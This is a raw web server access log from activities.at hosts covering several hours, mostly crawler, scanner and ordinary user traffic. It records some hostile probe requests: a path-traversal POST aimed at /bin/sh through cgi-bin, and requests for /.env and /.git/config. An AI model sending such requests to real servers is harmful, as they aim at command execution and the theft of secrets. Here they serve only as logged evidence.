103.96.72.171 - - [03/Feb/2025:04:40:17 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
141.255.166.90 - - [03/Feb/2025:04:40:54 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
47.128.39.201 - - [03/Feb/2025:04:41:25 +0100] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:04:42:03 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/paragraph.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.3.223.55 - - [03/Feb/2025:04:43:59 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.208.156.160 - - [03/Feb/2025:04:45:10 +0100] "\x16\x03\x01" 400 383 "-" "-"
185.208.156.160 - - [03/Feb/2025:04:45:11 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.123 Mobile/15E148 Safari/605.1"
156.59.198.135 - - [03/Feb/2025:04:50:04 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/input.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.245.117.221 - - [03/Feb/2025:04:53:10 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [03/Feb/2025:04:54:04 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/link.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:04:58:05 +0100] "GET /ed.activities.at/stats/lang/awstats-fr.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
147.45.112.17 - - [03/Feb/2025:04:58:43 +0100] "\x03" 400 383 "-" "-"
80.82.77.202 - - [03/Feb/2025:05:00:04 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
34.220.7.83 - - [03/Feb/2025:05:01:19 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
162.216.150.41 - - [03/Feb/2025:05:01:45 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [03/Feb/2025:05:14:07 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109291203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:05:19:43 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004230903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.13.224.222 - - [03/Feb/2025:05:22:44 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 7.0; i1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36"
156.59.198.135 - - [03/Feb/2025:05:23:43 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103131103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.13.224.222 - - [03/Feb/2025:05:24:51 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36"
156.59.198.136 - - [03/Feb/2025:05:27:43 +0100] "GET /docs/contadino/2017/RE17-000022.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
54.70.148.72 - - [03/Feb/2025:05:28:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
156.59.198.135 - - [03/Feb/2025:05:36:55 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/copy.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.121.84.7 - - [03/Feb/2025:05:44:03 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
151.235.201.40 - - [03/Feb/2025:05:51:04 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
156.59.198.136 - - [03/Feb/2025:05:56:58 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/position.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:06:00:58 +0100] "GET /ed.activities.at/stats/lang/awstats-dk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [03/Feb/2025:06:05:21 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [03/Feb/2025:06:20:16 +0100] "GET /ed.activities.at/stats/lang/awstats-is.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:06:24:16 +0100] "GET /docs/contadino/2017/RE17-000019.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.121.84.7 - - [03/Feb/2025:06:59:07 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [03/Feb/2025:07:00:57 +0100] "GET /docs/ecommlogistics/belege/RE2015.PDF HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:07:18:05 +0100] "GET /renault.2web.at/stats/lang/awstats-fi.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.144.212.139 - - [03/Feb/2025:07:43:43 +0100] "GET /.git/refs/ HTTP/1.1" 404 284 "-" "w3m/0.5.1"
156.59.198.136 - - [03/Feb/2025:07:44:10 +0100] "GET /docs/contadino/2017/RE17-000023.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:08:01:21 +0100] "GET /docs/contadino/2017/RE17-000030.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:08:05:21 +0100] "GET /ed.activities.at/stats/lang/awstats-tw.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:08:09:22 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/superscript.gif HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:08:13:22 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00004.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.146 - - [03/Feb/2025:08:21:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.79.213 - - [03/Feb/2025:08:37:15 +0100] "GET /sitemap.xml HTTP/1.1" 404 356 "-" "Mozilla/5.0"
87.121.79.213 - - [03/Feb/2025:08:37:15 +0100] "GET /robots.txt HTTP/1.1" 404 355 "-" "Mozilla/5.0"
87.121.79.213 - - [03/Feb/2025:08:37:15 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0"
141.255.166.90 - - [03/Feb/2025:08:41:39 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [03/Feb/2025:08:42:30 +0100] "GET /docs/contadino/2017/RE17-000024.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:09:00:38 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/table.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:09:04:39 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/form.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [03/Feb/2025:09:08:42 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.39 Safari/537.36"
61.197.114.206 - - [03/Feb/2025:09:10:38 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
61.197.114.206 - - [03/Feb/2025:09:10:41 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.135 - - [03/Feb/2025:09:26:46 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102261503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:09:35:39 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/block.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:09:39:39 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/cut.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.43 - - [03/Feb/2025:09:40:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [03/Feb/2025:09:43:41 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/char.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:09:47:43 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/time.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:09:51:43 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/redo.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
109.205.213.198 - - [03/Feb/2025:09:54:08 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [03/Feb/2025:09:55:44 +0100] "GET /ed.activities.at/stats/lang/awstats-fi.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Feb/2025:09:59:43 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909130803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.55.128.55 - - [03/Feb/2025:10:03:31 +0100] "GET /.git/config HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
156.59.198.135 - - [03/Feb/2025:10:03:44 +0100] "GET /renault.2web.at/stats/lang/awstats-en.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.126.16 - - [03/Feb/2025:10:07:46 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.24.124 - - [03/Feb/2025:10:11:44 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:10:15:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909101303_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:10:27:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011031603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [03/Feb/2025:10:31:45 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00006.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.112.242 - - [03/Feb/2025:10:35:46 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [03/Feb/2025:10:43:23 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /gui/javascript/form_form.js?1738575804 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /gui/javascript/form_form.js?1738575804 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /gui/javascript/form_form.js?1738575804 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:24 +0100] "GET /gui/javascript/form_form.js?1738575804 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:25 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:25 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2419 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:25 +0100] "GET /gui/javascript/form_form.js?1738575805 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:25 +0100] "GET /gui/javascript/form_form.js?1738575805 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:25 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1903 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:25 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:43:27 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1966 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:44:31 +0100] "GET /gui/javascript/form_form.js?1738575871 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:44:31 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2009 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:44:31 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:44:31 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2230 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:44:32 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:44:32 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:45:32 +0100] "GET /entry.php?id=10271&&ser=575871 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:45:32 +0100] "GET /gui/javascript/form_form.js?1738575932 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=575871" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:46:32 +0100] "GET /entry.php?id=10271&&ser=575932 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=575871" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:46:32 +0100] "GET /gui/javascript/form_form.js?1738575992 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=575932" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:47:32 +0100] "GET /entry.php?id=10271&&ser=575992 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=575932" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:47:32 +0100] "GET /gui/javascript/form_form.js?1738576052 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=575992" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
156.59.198.136 - - [03/Feb/2025:10:47:47 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/right.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [03/Feb/2025:10:48:13 +0100] "GET /entry.php?id=10828 HTTP/1.1" 200 9139 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:48:13 +0100] "GET /gui/javascript/form_form.js?1738576093 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:48:14 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:48:14 +0100] "GET /gui/javascript/form_form.js?1738576094 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889&document_id=&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:48:32 +0100] "GET /entry.php?id=10271&&ser=576052 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=575992" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.186.69 - - [03/Feb/2025:10:48:33 +0100] "GET /gui/javascript/form_form.js?1738576113 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=576052" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
